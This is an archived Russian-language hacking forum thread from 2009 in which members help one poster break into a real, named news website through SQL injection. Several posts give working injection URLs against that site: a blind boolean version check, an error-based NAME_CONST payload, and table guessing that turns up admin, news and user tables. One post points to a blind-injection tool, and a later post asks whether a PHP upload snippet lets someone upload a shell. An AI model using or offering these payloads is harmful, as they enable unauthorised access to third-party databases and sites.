ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
07.12.2009, 17:50
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604
Репутация:
19
|
|
Сообщение от 547
а на што тут смотреть?
на скул инъект наверно в поле ввода номера =)
|
|
|
08.12.2009, 21:39
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://podium.md/news_show.php?id=33'
доброе время суток уважаемые ачатовцы, хочу попросить помощи в раскрутке скули данного ресурса, либо я очень устал и уперся в банальность либо проблема в самом ресурсе.Заранее благодарен.
|
|
|
|
08.12.2009, 21:48
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552
Репутация:
1668
|
|
2Gorev
раскручивай как блинд
http://podium.md/news_show.php?id=33+and+substring(version(),1,1)=5
думаю нормального вывода не добиться
|
|
|
|
08.12.2009, 21:49
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832
Репутация:
1588
|
|
Код:
http://podium.md/news_show.php?id=33/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN%20(SELECT/**/NAME_CONST((version()),14)e)b)a)
пробуй крутить как блинд
Последний раз редактировалось [x60]unu; 08.12.2009 в 21:52..
|
|
|
|
08.12.2009, 21:55
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552
Репутация:
1668
|
|
2[x60]unu
где там таблы?
Код:
http://podium.md/news_show.php?id=33+and+(select+name_const((select+1),1))
Incorrect arguments to NAME_CONST
этот способ в данном случае не прокатит для вывода таблиц и тп. |
|
|
|
08.12.2009, 22:04
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://podium.md/news_show.php?id=33+AND+1=(SELECT+1+FROM+admin+LIM IT+0,1)--
методом тыка угадал таблы
admin,news,user
|
|
|
|
08.12.2009, 22:12
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
попробуй эту софтиу для слепых иньекций www.darkc0de.com/others/blindext.py
тама дето и хелп к ней лежал
|
|
|
|
08.12.2009, 22:22
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Код:
$filename = $_FILES['userfile']['name'];
if ($filename == 'ass.gif')
{
copy($_FILES['userfile']['tmp_name'], $uploadfile);
}
Уязвим ли этот кусок кода? К заливке шелла(файла) с расширением php
я считаю что нет... а пёс его знает, лучше спрошу у знатоков. |
|
|
|
09.12.2009, 06:24
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от Nightmarе
Код:
$filename = $_FILES['userfile']['name'];
if ($filename == 'ass.gif')
{
copy($_FILES['userfile']['tmp_name'], $uploadfile);
}
Уязвим ли этот кусок кода? К заливке шелла(файла) с расширением php
я считаю что нет... а пёс его знает, лучше спрошу у знатоков. Нет.
|
|
|
|
08.12.2009, 23:08
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
маловато кода выложил, где $uploadfile и форма загрузки - непонятно
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x60]unu](/avatars/avatar84758.jpg?1743062){kind=avatar}
Похожие темы
Комбинированный вид